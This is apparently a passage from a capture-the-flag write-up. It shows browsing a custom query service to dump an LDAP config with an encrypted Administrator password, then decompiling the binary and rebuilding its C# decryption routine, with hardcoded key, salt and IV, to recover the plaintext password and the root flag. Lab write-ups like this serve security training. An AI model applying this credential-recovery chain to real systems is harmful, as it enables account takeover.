Client Endpoint: 10.10.16.87:33366
Current Query Directory: C:\Program Files\HQK\ALL QUERIES
>setdir ..
Current directory set to HQK
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
>cd LDAP
Unrecognised command
>setdir LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>showquery 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=This was a bit lucky, I had to navigate with setdir/list in debug mode to understand and find this Ldap.conf file. Once again, we have it encrypted and we found the .exe before so this might be another VB program, so maybe trying to decompile it with https://github.com/icsharpcode/AvaloniaILSpy - If you have trouble to install it check installing Avalonia ILSpy.
If you decompile it with AvaloniaILSpy using the .exe as input looking on main module you will see:
else if (text.StartsWith("Password=", StringComparison.CurrentCultureIgnoreCase))
{
ldapSearchSettings.Password = CR.DS(text.Substring(text.IndexOf('=') + 1));
}This seems the function being used to decrypt the password CR.DS. You can check what happens on CR. Now, if we build our own version:
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;
public class CR
{
private const string K = "667912";
private const string I = "1L1SA61493DRV53Z";
private const string SA = "1313Rf99";
public static string DS(string EncryptedString)
{
if (string.IsNullOrEmpty(EncryptedString))
{
return string.Empty;
}
return RD(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256);
}
private static string RD(string cipherText, string passPhrase, string saltValue, int passwordIterations, string initVector, int keySize)
{
byte[] bytes = Encoding.ASCII.GetBytes(initVector);
byte[] bytes2 = Encoding.ASCII.GetBytes(saltValue);
byte[] array = Convert.FromBase64String(cipherText);
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passPhrase, bytes2, passwordIterations);
checked
{
byte[] bytes3 = rfc2898DeriveBytes.GetBytes((int)Math.Round((double)keySize / 8.0));
AesCryptoServiceProvider aesCryptoServiceProvider = new AesCryptoServiceProvider();
aesCryptoServiceProvider.Mode = CipherMode.CBC;
ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor(bytes3, bytes);
MemoryStream memoryStream = new MemoryStream(array);
CryptoStream cryptoStream = new CryptoStream(memoryStream, transform, CryptoStreamMode.Read);
byte[] array2 = new byte[array.Length + 1];
int count = cryptoStream.Read(array2, 0, array2.Length);
memoryStream.Close();
cryptoStream.Close();
return Encoding.ASCII.GetString(array2, 0, count);
}
}
}
public class Program
{
public static void Main()
{
Console.WriteLine(CR.DS("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4="));
}
}The output of it is: XtH4nkS4Pl4y1nGX (We have used dotnetfiddle for this again).
Getting the Administrator files and navigating there we can find the root flag.